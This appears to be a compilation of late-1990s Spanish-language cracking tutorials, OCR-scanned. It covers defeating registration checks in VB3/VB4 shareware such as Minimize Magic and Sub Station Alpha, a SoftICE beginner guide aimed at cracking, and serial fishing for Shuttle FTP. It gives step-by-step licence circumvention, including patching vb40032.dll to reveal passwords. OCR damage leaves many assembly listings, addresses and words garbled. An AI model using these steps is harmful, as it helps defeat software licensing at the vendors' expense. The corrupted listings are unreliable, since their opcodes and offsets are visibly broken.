Justo antes del REPZ CMPSSB si haces un 'ed si' y un 'ed es:di', verás 
con que es comparado. En este caso, el segundo y tercer carácter 
de la cadena que ingresamos son comparados con 'V8". Así que si 
reinicias el programa e ingresas 0V87654321 se registrará. 


Paso 9: aún no hemos terminado. Todo lo contrario! De verdad, la 
parte importante es lo que hacemos ahora. La proxima vez que 
conozcamos un programa en VB3 (y conoceremos muchos de ellos :) 
queremos colocar un breakpoint en la localidad con el código arriba y 
leemos el serial correcto. Como lo hacemos? Tratémoslo rápido con 
nuestro objetivo: The Collector. Inicia The Collector e ingresa un 
serial tonto. Entra a SoftlCE y coloca un breakpoint en hmemcpy. 
Deja Softlce y presiona 'OK', esto te regresará a SoftICE. Ahora, sal 
del kernel y entra al código de VBRUN300 (presiona F11 y F10 hasta 
que llegues allí) 


Ahora has una busqueda del partron: 
8B,CA,F3,A6,74,01,9f,92,8D,5E,08,E8,0E,06 este es el "mov cx, dx" y 
el resto que hemos visto arriba, busca: s 0 | FEF 
8B,CA,F3,A6,74,01,9f,92,8D,5E,08,E8,0E,06 coloca un breakpoint en 
la dirección que es retornada (bpx <seg:offset>) 


-presiona F5 y aterrizaras en la mitad del código de comparación 
de arriba 

-solo queda algo por hacer y es chequear los punteros en es:di y 
ds:si 


Caso 2 : Minimize Magic 1.2.4 


Minimize Magic es una utilidad que puedes usar para minimizar tus 
programas en la barra de tareas. 


Mas del programa: 


Nombre  : Minimize Magic 1.2.4 

Donde : http: //www.genesoft.demon.co.uk/ 
Tamaño  : minimagic.exe = 159.744 bytes 
Protección : password basado en una llave 

DLL ¿usa VB4 dll < eee Y B4 DLL 


Para crackear este programa puedes proceder en la misma forma que 
usamos con The Collector. Comenzando con hmemcpy, trabajando a 
tu manera al código que compara las cadenas que ingresaste. Algo 
importante es saber que el dll VB4 siempre convierte las cadenas al 
formato WideChar antes de hacer algo con ellas. Así que en lugar de 
usar hmemcpy puedes fijar un breakpoint en MultiByteToWideChar 
para romper. Chequea tu referencia a las API's de windows para 
aprender mas acerca de esta función. He hecho la parte dura del 
trabajo por ti y encontre el código de la dll VB4 que compara las 2 
cadenas (en formato WideChar!). Aquí está el listado: 


56 push esi 
nl push edi 
8B'C2410 mov edt., [esp + 107 


8B74240C mov esi, [lesp + 0C] 


8B4C2414 mov ecx, lesp + 14] 

190 xOor eax, eax 

F366A7 repz cmpsw ¿<aquí las Cadenas en 
ds:esi 

7405 Je 0F79B362 ; y es:edi son 
comparadas 

1BCO0 sbb eax, eax 

83D8FF sbb eax, EFEFFFEFE 

5F pop edi 

5E pop esi 

CZOCOO ret 000€ 


Ahora sabemos lo suficiente sobre la dll VB4, crackiemos Minimize 
Magic: 


Paso 1: inicia Minimize Magic y escoge registrar desde los menus. Te 
preguntará tu Nombre y un Password. Ingresa un nombre y password 
tonto. No presiones 'OK' aún, continua con el siguiente paso. 


Paso 2: entra a SoftlCE y coloca un breakpoint en hmemcpy. Sal de 
softice y presiona 'OK'. Aterrizaras en SoftlCE. 


Paso 3: Presiona F11 y F10 hasta que estes fuera del kernel y en el 
código de VB40032.dll. 


Ahora buscaremos el patron del código de arriba. Has 's O | FEF 
56,57,8b,7Cc,24,10,8b,74,24,0C,8b,4c,24,14' y coloca un breakpoint en 
la dirección que es retornada. 


Paso 4: Presiona F5 para salir de SoftlCE... romperas 
intermediamente de Nuevo en el objetivo, justo al inicio del código de 
arriba. Aquí el pass que ingresaste sera comparado con el pass 


correcto. Rastrea hasta justo antes de REPZ CMPSW y has un 'ed 
es:edi', esto mostrará el pass que ingresaste. Si haces 'ed esi' versa 
el pass correcto. (esta cadena sera en formato WideChar por ejemplo 
podrías ver ATGHDEHD. Esto significa que tu pass es 
ATGHDEHD) Okas, ahora encontramos un pass functional que 
trabajará solo para la versión instalada en tu compu. Si le das el pass 
a alguien mas, el programa no lo aceptará. El pass es calculado 
desde una llave (key) que es diferente en cada compu. Esta Key 
puede ser generada aleatoriamente en el setup o basado en la info de 
tu hd, o en la fecha, el tiempo o en algo. Cualquiera que sea, podría 
ser difícil de encontrar como es generado o donde es almacenado. 


Así que, como podemos hacer un crack general? Podríamos usar el 
truco 'Magic Window" aquí. 'Reprogramaremos' el VB40032.dll para 
mostrar el pass correcto. El código original en el VB40032.dll se ve 
como esto: 


0F79B5408: 96 push esi 

¡UN TOBIAO 34 push edi 

:0F79B34A 8B7C2410 mov edi, [esp + 10] ; es:edi> 
pass que ingresaste :0F79B34E 8B74240C mov esi, 
[esp +.0C1 $ esti =>. pass Correcto 

¿OF 79B3592 2B4C241:4 mov ecx, lesp + 14] 


“DETOBSI6 3360 xor eax, eax 

:0F79B358 F366A7 repz cmpsw 7. ¡EOS 
compara 

¿DETSB39B 1405 Te UEFTOBSOZ 

¿0E79B35D-L1BC€0 sbb eax, eax 

¿DETIBSOF S3DSER sbb eax, FEFEFEFEEFE 

DE TOBOOZ 0 E pop edi 

:DEJIBSOS. OE pop esi 

¿0F79B364 (E20C00 ret 000€ ; final de esta 


FUuncrtón 


OP TSBIO6T 07 push edi el «egdgo 
abajo de esta dirección 

:0F79B368 8B7C2408 mov edi, lesp + 08] ¡no es 
importante, pero 

:0F79B36C 8B4C2410 mov ecx, lesp + 10] 
¡necesitaremos este espacio 

:O0F79B370 8B44240C mov eax, lesp + 0C] 


:0F79B374 0BE4 or esp, esp 
:O0F79B370 F266AF repnz scasw 
:O0F79B379 B800000000 mov eax, 00000000 
¿UEJTSIBSIE- 003 jne 0F79B383 
:0F79B380 8D47FE lea eax, ledi-02] 
¿UF TOBSS 30 pop edi 

¿UF TB EZUCUO ret 000€ 


El código está localizado en el offset 7a748 en el archivo 
vb40032.dll. Así, para hacer que un crack general haga un parche 
que cambie el código de arriba: 


:0F79B348 56 push esi 

:0F79B349 57 push edi 

:0F79B34a 8B7C2410 mov edi. esp: + 10 ses seda. == 
>texto que ingresate 

:0F79B34E 8B74240C mov. €sTt. [esp + 00€ Fest. ==> 


pass Correcto 
¿OETSBSIZ. 913" 70006300. mp .dword: per. [ed], 


00630070;edi => PC" ? 


UETSIBIO TOLd jne 0F79B381 ASA o 
salir 
¿OF79IB3DA 803E00 cmp byte ptr [esil], 00 [<= 


estas líneas 
:0F79B35D 7410 Je 0F79B36EF | 


ponen espacios 


¡OE7F9IBS9IF -83C6U]1 add esi, 00000001 | 
entre. daracteres 

:0F79B362 C60620 mov: byte ptr [est], “20 | 
“UFT9IBIOS “EB0S Jmp OF79B36A | <== 
saltar el ret 

¿OET9IB36/ EZ0CO0 ret 000€ ¿<-- esto previene 
un crash 

¿DET? IBSOA 83 OD: add esi, 00000001 | 
:0F79B36D EBEB jmp 0F79B35A | <- 


al: IRICRO 
¿QE79B36F 8B3DDCC47B0F mov edi, [0F7BC4DC] *<== 
estas lineas 


¿UETIBITO 0B142 40€ mov esi, lesp + 0C] * llaman 
a la función 

:0F79B379 6ADO push 00000000 * MessageBoxA 
¡UETIBITB 36 push esi * para mostrar 
UFTIBIIO 06 push esi * el pass correcto 
:0F79B37D 6A0DO push 00000000 * 

¿UFTOBITE FED] Call edi * 

DETOBSOl- E pop edi 

SUETOBIOZ. DE pop esi 

DETFIBIOS: 90 nop 

:0F79B384 C20C00 ret 000€ 


Comentarios: usamos el espacio de 2 rutinas, para prevenir un crash 
tenemos que poner una función RET en el inicio de la segunda 
función (original) (ver línea OF79B367). Esta parte del código de dll 
VB4 no es usada para chequear los passwords. Es usada por otras 
partes del programa. Por lo tanto, necesitamos hacer algo para que 
solo algo pueda ser mostrado cuando estamos tratando con una 
comparación de passwords. 


Esto es lo que el código en la línea OF79B352 trata. Chequea para 
ver si EDI apunta al siguiente texto "PC". Así podemos usar esto para 
activar el crack. Para activar el crack, "PC" tiene que ser ingresado 
en la cadena por pass cuando te registras. Las líneas marcadas con | 
están allí para poner espacios entre caracteres de la cadena. 
Originalmente allí estaría una cadena en formato WideChar. Esto 
significa que en memoria habrán ceros entre los caracteres. Pero la 
función que hemos usado para mostrarnos el texto (MessageBoxA) 
convierte los O al final de la cadena. Así que obtendríamos solo 1 
letra si no hiciéramos el reemplazo de los ceros con espacios. Las 
líneas marcadas con * están allí para llama a la función MessageBoxA 
para mostrar el pass correcto. 


Rasgué esos commandos del dll VB4. coloqué un breakpoint en 
MessageBoxA para ver como VB4 lo llamaba. Bien, esto es para 
Minimize Magic. Para hacer un crack general, un parche podría ser 
escrito para parchear el dll VB4 en offset 7a748 con el código de 
arriba. Para usarlo, minimagic.exe y vb40032.dll deberían estar en un 
directorio temporal y el parche ejecutarse allí. Luego iniciar 
minimize.exe desde ese directorio temporal y usar 'PC' por pass. Y 
voila, una ventana aparecerá con el pass correcto. Una vez el pass 
correcto es conocido, los archivos temporales serían borrados y el 
pass puede ser usado en el Minimize Magic original. 


Caso 3 : Sub Station Alpha 2.02 


La mayoria de los programas VB4 pueden ser crackeados con el 
método descrito en el caso 2, pero he encontrado 2 programas que 
usan un método distinto de comparación. Uno de estos programas es 
Sub Station Alpha 2.02. Usa una protección que primero convierte un 
numero que ingresaste a su valor hex y luego lo compara con el 
numero correcto. Comencemos a crackear Sub Station Alpha ahora: 
las cosas se aclararán. Info acerca del programa: 


Nombre  : Sub Station Alpha 2.02 
Donde : http://www.eswat.demon.co.uk/index.html 
Tamaño  : 629.248 bytes 
Protección : password basado en un user name 

DLL 
Usa VB4 dll 


Primeramente mencioné que VB4 convierte cadenas al formato 
widechar antes de hacer algo con ellos. Por lo tanto usaremos esta 
función como punto de entrada. De nuevo lo haremos paso a paso ;-- 


) 


Paso 1: inicia Sub Station Alpha y escoge register desde los menus. 
Ingres un nombre y un key de registro tonto. 


Paso 2: entra a SoftlCE y coloca un breakpoint en 
MultiByteToWideChar (con el commando 'bpx multibytetowidechar') 


Paso 3: ahora, sal de SoftlCE y presiona "Register". 


Paso 4: Softice interrumpirá en el inicio de MultiByteToWideChar, 
presiona F11 para salir. Verás: 


¡FEI500C27B0OF call 
[KERNEL32!'MultiByteToWideChar ] 

: 8BD8 mov ebx, eax 

¿OIFEFF cmp esi, EFFFEFEFF 

7001 jne 0F738BCF 

:4B dec ebx 

103 push ebx 

: GADO push 00 

"FELSOISCO71B0P call dwotrd ptr L0OF7BCG918] 


: 8BE8 mov ebp, eax 


S5ED test ebp, ebp 


:0F845B260100 Jz 0F74B23D 
: 43 inc ebx 

po) push ebx 

100 push ebp 

NÓ push esi 

0) push edi 

: GADO push 00 

: GADO push 00 
“PFESO00C27B0 Call 
[KERNEL32!'MultiByteToWideChar ] 
 OBCO mov eax, ebp ;¡<-- has 'ed ebp' 
aquí 

29D pop ebp 

¿SE pop: edi 

OL pop esi 


El lugar importante está justo despues de la segunda llamada a 
MultiByte- ToWideChar. Desactiva el primer bp en 
MultiByteToWideChar y coloca un Nuevo bp despues de la segunda 
llamada a la función (en la línea con MOV EAX,EBP). En la línea 
EBP contendrá un puntero a una cadena en formato WideChar que 
fue procesado. No tiene que ser la cadena de la llave de registro. 
Por lo tanto, editaremos ese breakpoint para que trabaje solo 
interrumpiendo cuando este procesando la llave de registro. Como 
podemos hacerlo? Bien, la función MultiByteToWideChar retorna la 
longitud de la cadena que procesa mas 1 en EAX. Así agregaremos 
una declaración condicional en el breakpoint. Has 'bl' para encontrar 
que es el numero en ese breakpoint. Entonces has un 'bpe + y 
agrega 'if al="=<lengthOfKeyString+1">' al breakpoint. Por ejemplo, si 
ingresas '212121", lenghtOfKeyString sería 6 :--). 


Paso 5: Ahora dejaremos corer el programa con F5. cuando Softlce 
rompa has un 'ed edp' y ve la forma WideChar de la llave que 
encontraste. Colocamos un bpr en el bloque de memoria conteniendo 
la cadena y continuamos (F5). Lo que pasará es esto. Softice 
romperá en varios lugares. Lo que es importante es que rompera en 
el código de OLEAUT32. cuando esto pase, rastrea un poco mas 
para ver que está pasando. Las primeras veces saldrás de 
OLEAUT32 muy rápido. Pero eventualmente verás este código: 


( listado de OLEAUT32.DLL) 


:6934B6B3 395C240C cmp [esp + OC], ebx ; este es 
un loop que 

:6534B6B7 7E14 Jle 6534B6CD ; vaa 
través de 

"6934B0B9 3369 XOr .ECX” EX E <L8S 


Caracteres de una :6534B6BB 8D0492 lea eax, ledx + 
4*edx] ; Cadena, en el final 


:6534B6BE 8A0E mov cl , [esi] ¿  edx 
tendrá el valor 

:6534B6C0 46 inc esi ;  hex de 
la cadena 

+6534B6C1 4F dec edi 


:6534B6C2 FF4C240C dec lesp + OC] 
:6534B6C6 8D1441 lea edx, lecx + 2*eax] 


"GISABOOO ¿OIE E test edi, edi 
:6534B6CB EEO6 Jg 6534B6B3 
“65939 1BO0CD: SOEE test edi, edi 
:6534B6CF 7EF4A O Cos 4B71B 


:6534B6F2 8910 mov [|eax], edx ¿ edx es 


guardado 

:05934B6F4 
:05934B6F6 
¿6934B06E9 


SI 101 0) xor eax, eax 
830424 add esp, 00000024 
CALDO ret 0010 


Paso 6: vimos que la llave es transformada en su valor hex y 
guardada en un lugar en memoria. Si monitoreas esta localidad de 
memoria, terminarás en el dll VB4 que la compara con otro valor: 


¡OF7A2CE1 


edx 
¿QEF7AZCEZ 


eax 
:OFT7AZCES 


resta 

"DETAZCES 
UF TAZCES 
“UE 7AZCEA 
¡OF7AZCEB 


¿OFYAZCEE 
¿OF7AZ2CEF1L 


OF 7/B99F4] 
¡OF7AZCES 


SA 


58 


2ZBEZ 


83F801 
1BCO 
50 
OFB706 


83ce02 
FF2445F4997B0F 


ES8BB000000 


pop edx ; Carga 
pop eax Carga 
sub eax, edx LOS 


cmp eax, 00000001 

sbb eax, eax 

push eax 

MOVZX word ptr eax, lesi] 


add esi, 00000002 
Jjmp dword ptr [2*eax + 


call OF7A2DB8 


Vemos que EDX y EAX son cargados desde la pila y luego son 
restados. Esto es una forma indirecta de comparar los 2 valores. Si 
revisas el contenido de EAX y EDX, versa que uno tiene el numero 
que ingresaste y el otro tendrá el numero de registro correcto. 


Paso 7: ahora encontramos esta localidad, es sabio notar los valores 
hex del código, para que puedas encontrarlos rápido cuando 
sospeches que otro programa VB4 usa esta protección. 


Notas Finales 


Bien, con las 3 técnicas de arriba he sido capaz de realmente 
crackear algunos programas VB3/4 que usan la protección basada en 
texto. Algunas veces cuando fijas un breakpoint en la rutina de 
comparación, SICE no interrumpira. Trata entonces de ingresar una 
cadena con una longitud diferente. Porque el programa podría ser 
chequeado por la longitud de la cadena que ingresas y entonces 
comparar los caracteres aislados, pero de nuevo ser comparados en 
las localidades declaradas en los ejemplos de arriba. 


Con programas VB5 no tengo mucha experiencia, solo he crackeado 
uno. Es el Hitlist Pro v3.0. Parcheando el dll VB5, pude remover su 
limitación de 30 días justo como un programa regular. Por supuesto, 
el dll VB5 tenia que ser colocado en el directorio principal de Hitlist 
Pro, esto para prevenir que otros programas VB5 usaran el DLL 
parcheado. 


Eso es todo amigos, pueden contactarme (si saben como ;--) en irc 
con retroalimentación y preguntas. 


Grandes Saludos a: HATDUDE, madmax!, cH, Teraphy, 
KillerBee,j0b, 
StarDogg Champion,aCP,rANDOM y todos los otros 
que olvide. 


Gracias y saludos especiales a +0RC y el resto +HCU 


razzia [pc97] 
fecha: 08 May 1997 


Estoy impresionado. Creo que deberiamos usar esta aproximación tambien 
con todas las OTRAS dll's en lenguajes sobreinflados... digamos por ejemplo 
las *.dll de Visual c++... esto solo es una idea! Estoy listo a mi manera :-) 
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mEX/c4N TUTORIAL DIVISION 


Tutor :CoRN2 

Traductor : “[G]oLe[EJ" 

Editor — : Notepad (Pantalla completa con el ajuste de línea) 

Audiencia: Principiantes y Newbies :) 

Saludos — : A todos los miembros de C4N/mEx'97... y a todos los demas que conozco :) 
Objetivo: SoftIce para Newbies, rá 

Fecha de Rev: 17/12/97 


Checa http://mex97.home.ml.org para todas tus necesidades de crackeo!! 


Prólogo 


Hey allí, wow, Estoy en la revisión 4 de este tutorial ahora! Gracias a todos que me han escrito, especialmente aquellos con sugerencias útiles. Esta actualización por lo tanto, es debido a la demanda publica ;) Esperanzadoramente ayudará a todos ustedes newbies alla afuera, quiza no... ah bueno... ;) 


Introducción 


Todos hacen la pregunta, 'qué debugger debo usar? La respuesta usualmente es SoftIce... la segunda pregunta es 'cómo uso Softlce!?!' este tutorial deberia cubrir los aspectos básicos del uso de SoftICE para nuestras 'malas' necesidades! ;) 


Voy a asumir que estás usando SoftIce/Win95 v3.0 o superior. Una vez instalado, Softlce vive detrás de windows hasta que lo necesites... ahora lo divertido... 


Para a 


¡ar a SoftIce simplemente presionas <CTRL-D> a menos, por supuesto, que hayas cambiado este hotkey. 


EXTERNALS 


Esto parece atormentar a todos los que recuerdan el día en que sus dedos rastrearon la sacra combinación CTRL-D. Mi primera pregunta fue (en cracking ) hasta donde recuerdo, por qué no puedo poner un breakpoint en GETDLGITEMTEXT (o funciones similares ) 
Me tomó una semana hasta que alguien contesto ( cán rocks! conectate conectate ) es realmente muy fácil. Pienso que esto está cubierto en el c4n-mex faq también: 


Carga el archivo WINICE.DAT en tu editor de texto favorito (notepad lo hará si no tienes uno :P) y encuentra las linea: 


:a del final del archivo que inician con: 


exp=cWindows_directorylkernel32.dll 
exp=cWwindows_directoryluser32.dll 


Si remueves el punto y coma ';' del inicio de estas 2 líneas, la mayoria de las llamadas estarán disponiblese- si no, remuevelos de otras líneas. Graba WINICE.DAT y reinicia windows/softice, fácil eh? 


también puedes usar el symbol loader para editar estos settings ( gracias _[mP] :) ) 


mientras estamos en el asunto del WINICE.DAT, piensé que deberías saber las teclas *default* mas utiles para SL... 


Fl - Ayuda 
F2 - Interruptor a la ventana de Registros 
FS - Regresa a Windows 


FS - Rastrea la Siguiente Instrucción (se sumergirá en todos los CALLS) 
F10 - Camina a la siguiente instrucción (ejecuta y camina sobre los CALLS) 
F12 - Ejecuta hasta la siguiente instrucción RETurn 


Hay muchos mas, pero estos son los que más usaría... 


Ahora, vamos a las cosas divertidas... 


Aunque quizas algo desanimante al principio, todo es muy simple. Realmente necesitas tener una vaga idea sobre ASM para que pueda ser capaz de explicarte esto propiamente. Si no, obten mi tut, 'ASM For Crackers' (PLUG! PLUG!) de la homepage de mExeLITE'97 homepage. Debería cubrir lo básico. 


ALGO SOBRE LA PANTALLA QUE ESTAS VIENDO 


Antes de continuar, debe s cuatro (cuentalas) cajas separadas en tu pantalla, si no, deberias notar que ellas pueden ser ocultadas/mostradas con cualquiera de los siguientes comandos: 
WR -- Muestra/Oculta la Ventana de Registro | 

WD -- Muestra/Oculta la Ventana de Datos) Incluyendo un numero despues del comando 

WC -- Muestra/Oculta la Ventana de Código — | te permite fijar cuantas lin 


son usadas. 


Estos son los mas importantes, pero encontrarás que hay otras ventanas que puedes interrumpir, incluyendo watches etc... pero esto servira para los propositos de este tut. 
Estas ventanas pueden ser estercoladas individualmente, cada una es desplazada con la siguiente combinación de teclas: 


<CTRL-UP/DOWN/PGUP/PGDN> Desplaza la CODE Window 
<SHIFT-UP/DOWN/PGUP/PGDN> Desplaza tu Ventana de Comando 
<ALT-UP/DOWN/PGUP/PGDN> Desplaza tu Ventana de Datos 


Un poco de un excelente truco envuelve la Ventana de DATOS, algunos pobres esquemas de protección terminan poniendo el 'numero de serie” correcto un par de bytes lejos de tu ingreso, simplemente desplazando tu ventana de DATOS, es posible descubrir el serial y salvarte de una gran carga de trabajo! --Excelentisimo huh? 


Ahora de regreso al tut. 


Okas. ahora sabes que son los registros y espero que un poco de como se ve el assembler. 

Las primeras 3 líneas de la pantalla están dedicadas a los registros de tu compu y su contenido. Esto es bastante auto-explicativo. 

EAX=l0 que sea, EBX=l0 que sea, etc. 

La segunda línea en la parte derecha contiene 8 letras, estas son tus flags. Letras mayusculas azules indican que la flag está fijada, estas flags son: 
ODISZAPC 


Carry Flag (Flag de transporte) 
Parity Flag (Flag de paridad) 
Auxiliary Carry Flag (Flag auxiliar de transporte 
Zero Flag (Flag Cero MUY UTIL! ) 
Sign Flag (Fla de Signo) 
Interrupt Flag (Flag de interrupción) 
- Direction Flag (Flag de dirección) 
--- Overflow Flag (Flag de desbordamiento) 


Para ser honesto, la única que he visto mientras crackeo, es la Zero Flag (es buscada para los comandos JZ/JNZ/JE/JNE ) 
Después tenemos otra ventana debajo, esta es tu ventana de datos. Muestra los valores de cualquier dirección de memoria que puedas necesitar. Como ejemplo, escribe: d FOD2B - --esto muestra los bytes en esa dirección. 


'd' es tu comando de visualización de memoria. 


Siguiendo esto, tenemos la ventana de código. Esta contiene la parte del programa que estamos viendo. Primeramente tenemos el segmento:offset del código, después el opcode, luego los comandos en asm que tanto amamos (nota del traductor: al menos yo no) :) 
(NB puedes escribir 'CODE ON' para ver los opcode ) 


Y finalmente en el fondo está tu Ventana de ingreso/información. En otras palabras el bit que usas para hablarle a Softlce, y escucha su respuesta. 


BREAKPOINTS EN GENERAL 


BREAKPOINT EN EJECUCION 


SYNTAX: bpx <nombre de la función API> 


El principal problema con el cracking... humm.. perdon, debugging ( heh! ) es encontrar por ti mismo el Punto de entrada al programa. La mas fácil y mas efectiva forma es de comenzar es con breakpoints. 
Basicamente, todo lo que necesitas para hacerlo es decirle a SICE cuando 'interrumpir' el programa para que puedas ver lo que está pasando. El tipo de breakpoint que usarías depende del tipo de programa que estes tratando de 'debuggear' ;) 
Para mostrar esto, tomaremos un ejemplo: 

1. Ve Softlce ( CTRL-D ), y escribe 'bpx GetLocalTime' 


2. El prompt debería retornar, regresa a win (CTRL-D ) 
3. Haz Doble click en el reloj de sistema de win95 ( usualmente en la barra de tareas ) 


Softlce deberia aparecer ahora, al inicio de la llamada a 'GetLocalTime”, si presionas Fl 1 regr: a la parte del código que llamó esta función. 


Otra función call para fijar un breakpoint que es útil cuando crackeamos una protección de número de serie es 'GetWindowTexta' o 'GetDlgltemTexta'. Esto se hace de la misma forma. 


1. Click en tu boton inicio ( Bien viejo MS :P ) y haz click sobre el botón 'ejecutar' 
2. Escribe cualquier cosa, ie. 'lalalalalalalalalaa” NO PRESIONES ENTER 

3. Entra a Softlce. ( CTRL-D ) 

i PX GetWindowTextA 

a win, ahora presiona ENTER 


SoftIce aparece al inicio de 'GetWindowTexta', de nuevo presiona F11 para regresar al código que lo llamó. GetDlgltemTexta no es usado mucho según mi experiencia, pero vale la pena tratar si nada pasa con GetWindowTexta. 


BUSCANDO EN MEMORIA 


SYNTAX: s <INICIO> | <FINAL> 'SCADENA>' 
Esto es simple. Digamos que has ingresado tu info para registrarte y estas perdido dentro del código, para ayudarte puedes buscar en memoria tu info (WOW! ;) ) 
Cuando buscas, quieres buscarla en todos lados, yo uso principalmente: 


s 0 1 ££fFFfff 'micadena" 


Una vez encontrada, obtendras un bonito prompt diciendote en que parte de la memoria está y la ventana de datos camiba a esa dirección. 
Para buscar de nuevo, solo escribe: s 


Esto se mantendrá buscando, sin embargo, ten cuidado, que en mi experiencia, cualquier cadena encontrada cerca del area 80000000+ y CO000000+ son duplicados o bytes flotantes debido al sorprendente manejo de ram de Win95 :) no estás contento de haberlo 'comprado"?! 


BREAKPOINTIANDO EN ACCESO A MEMORIA 


Usualmente es usado en conjunción con el paso de arriba, buscando. Una vez que has encontrado tu cadena, de que te sirve??? 
Digamos que a través de la busqueda, obtengo el prompt: 
Patrón encontrado en 0157:0009AC2D 


Okas, esto nos dice que mi cadena fue encontrada en la localidad 0157:0009AC2D ( doh! ). Para hacer que SoftICE monitoree esto, usaríamos: 


BPM 0157:0009AC2D 


El R/W le dice a SoftICe si aparecer en una operación de lectura o una de escritura en esa dirección. El default es RW (read £ write, en español lectura $2 escritura ) 


BREAKPOINTIANDO EN UN RANGO DE ACCESO A MEMORIA 


SYNTAX: BPR <dir 


¡Ón para iniciar> <dirección para terminar> R/W 
Algunas veces una función mas útil. Imagina por ejemplo, que quieres rastrear un rango de direcciones de memoria, por ejemplo, una cadena de Usuario o código de desbloqueo. 

Dado el ejemplo, si fueramos a buscar mi username, 'mExeLITE'97 cracked bY CoRN2,, y digo que fue encontrado en 0157:00643345. Si quería mantener un ojo en el rango completo de direcciones de memoria tomadas por esta cadena, usaria la sintaxis: 
BPR 0157:00643345 0157:00643345+(Longitud de la cadena en hex) 

Esto causara que Sl aparezca siempre que alguna parte de la memoria en este rango sea leída o escrita. 

Ahora veremos los manipuladores adicionales de breakpoint que te harán gritarle a SI cuando aparezca horas despues de que terminaste de crackear. 


LISTAR BREAKPOINTS 


SYNTAX: bl 


Simplemente lista cualquier breakpoint definido en el siguiente formato: 
NUM) TIPO_DE_BREAKPOINT PARAMETROS CONTADOS 


Un ejemplo podría ser: 
00) BPX 10028:09876543 C=01 


Esto nos dice que SoftICE aparecerá simpre y cuando la instrucción en la dirección 0028:09876543 dependiendo del número de veces que ocurren, especificados por Count. En el ejemplo anterior, desde que C=01 SI aparecerá la primera vez que esto ocurra. 


LIMPIANDO BREAKPOINTS 


nOTA dEL tRADUCTOR: /* esta parte fue traducida el 06 de noviembre del 2k, me hubiera gustado leer precisamente esta parte unos minutos antes, ya que hoy fue mi primer encuentro con SICE, y fije algunos breakpoints, y luego no lograbra regresar a windows, así que me tomó como 10 minutos encontrar en la ayuda el comando para quitarlos, imaginen eso. */ nOTA dEL 'RADUCTOR 
Esto quita el (los) breakpoint(s), por ejemplo: 
BCO  <-- Elimina los breakpoints etiquetados con O 


BC 1,4 <-- Elimina los breakpoints etiquetados 1 y 4 
BC* — <-- Elimina todos los breakpoints 


DESACTIVANDO BREAKPOINTS 


Algunas veces será mas benéfico (o más útil) simplemente desactivar temporalmente un breakpoint, en lugar de removerlo completamente. De nuevo como ejemplo: 


BD 1,2,3,5 <-- Desactiva los breakpoints etiquetados con 1,2,3,5 
BD1 <-- Desactiva los breakpoints 1 
BD* <-- Desactiva todos los breakpoints 


ACTIVANDO BREAKPOINTS 


SYNTAX:; 


e <breakpoint(s)> 


Obviamente, si puedes desactivar breakpoints, vas a necesitar ser capaz de acrivarlos de nuevo. No te daré mas ejemplos porque esto sigue la misma syntaxis dada arriba. 


SOFTICE « La Red (Internet/La Super Carretera de la Inform: 


Algunas personas ( yo todavía no ) han experimentado un problema cuando crackean cuando están conectadas. Esto no afecta a las personas que ( como yo ) no tiene la suficiente suerte de obtener LLAMADAS LOCALES GRATIS!! que tiene que pagar £££'s por sus recibos telefónicos... sorry. 


ción ARRGGH!) 


De cualquier forma, si estas conectado y pasas a SoftICE mucha gente experimenta la perdida de su conección ( principalmente en IRC ) Aparentemente esto se puede arreglar usando el comando AWAY asuidsodj, pero no sé. Pruebalo si te unes. 


PALABRAS FINALES 


Este tut debería ( esperanzadamente, a menos que lo eche a perder ) cubrir lo suficiente sobre SoftIce para permitir al newbie promedio comenzar. Se que hay muchas porquerias que no cubrí, pero habrá un tut mas avanzado pronto (Ve este espacio | [3)) 


Si hay algo mas que pienses que la gente deba saber para comenza, o algo que pienses que debería ser agregado, mandame un email a CORNO2Ghotmail.com y dimelo. Puedo ser localizado en EFNET, en HCracking4Newbies la mayor parte del tiempo... alguien será capaz de ayudarte de cualquier forma... 


Espero que esto ayude a alguien que quiera aprender lo mas facil... Pude haberlo hecho con algo como esto cuando empezé. Buena suerte! 


-- CoRN2 [mE'97/C4N] 


mEX/c4N TUTORIAL DIVISION 


Heh, no pensé que alguien podria molestarse leyendo aquí abajo. 
HAS ENCONTRADO LA PARTE SECRETA DE ESTE TUT! Felicitaciones! :) 


wow, haz ganado un año de suministros de spam. 


SHUTTLE FTP yv 1.0 


[ NemESis ] 
o CrackingparaPrincipiantes 


Información del Programa 


Nombre : SHUTTLE FTP y 1.0 


Tipo : Shareware para ftp. 


URL : http://www.waveflow.com/shuttleftp/shuttleftp.zip 


Tamaño : 865 Kb. 


Herramientas : 


Hexwok Shop v 3.01 


W32Dasm v8.93 
Facil ( X ) Medio ( ) Dificil ( ) Profesional ( ) 


Traducido por PrOfEsOr X / Tnt crack Team 


INTRODUCCION 8 PROTECCION | 


Shuttle FTP, es un cliente multiprotocolo internet, este a sido diseñado para trabajar en medio ambiente de windows, es visual, 
facil e intuitiva interfaz. PRUEBALO ;-) aquí veremos como obtener un Numero de Serie valido 


Manos a a obra!!!! 


veamos primero que dice el programa al introducir un nombre y un password, lo mas seguro es que diga !! NIÑO MALO !!!!, 
pero lo que nosotros queremos que diga es !! NIÑO BUENO !!! 


Ahora ejecuta el shuttleftp.exe en la ventana principal del programa da click en el meu 
HELP/REGISTRATION/REGISTRATION KEY en la ventana de dialogo escribe tu nombre y un numero de serie que en mi 
caso pondre: 


Login : Nemesis] TNT!Crack!Team 
Password: 999999 
pero espera todavia no des click en el boton que dice OK! 


ve a el Softlce presionando [ CONTTROL D ] pon el BreakPoint BPX HMEMCPY y presiona , FS para regresar a el 
shuttleftp, ahora si ya es tiempo de que des click en el boton que dice OK! y de golpe regresamos a el Softlce, despues presiona 
F12 mas o menos 12 veces y tu podras ver este codigo: 


: 004A74F1 8B83D4020000 mov eax, dword ptr [ebx+000002d4] 
:004A74F7 ES3C91F8FF call 00430638 <--- lands here 
:004A74FC 8B45F4 mov eax, dword ptr [ebp-oc] 

:004A74FF 50 push eax <---- type d eax [your fake number] 
:004A7500 8D55FO lea edx, dword ptr [ebp-10] 

:004A7503 8B83D0020000 mov eax, dword ptr [ebp+000002d0] 
:004A7509 E82A91F8FF call 00430638 

:004A750E 8B45F0 mov eax, dword ptr [ebp-10] 

:004A7511 8D55FC lea edx, dword ptr [ebp-04] 

:004A7514 ES6B0530000 call 004A7A84 <-------- tu nombre 
:004A7519 8B55FC mov edx, dword ptr [ebp-04] 

:004A751C 58 POP eax <-------- teclea d edx y tu podras ver en la ventana de datos el codigo deseado 
:004A751D E826CAFSFF call 00403F48 


:004A7522 0F854A010000 ¡ne 004A7672 


un registro ilegal!!! 


saludos !!! hasta la proxima !!! 


[ NEMESIS ] / TNT CRACK TEAM 


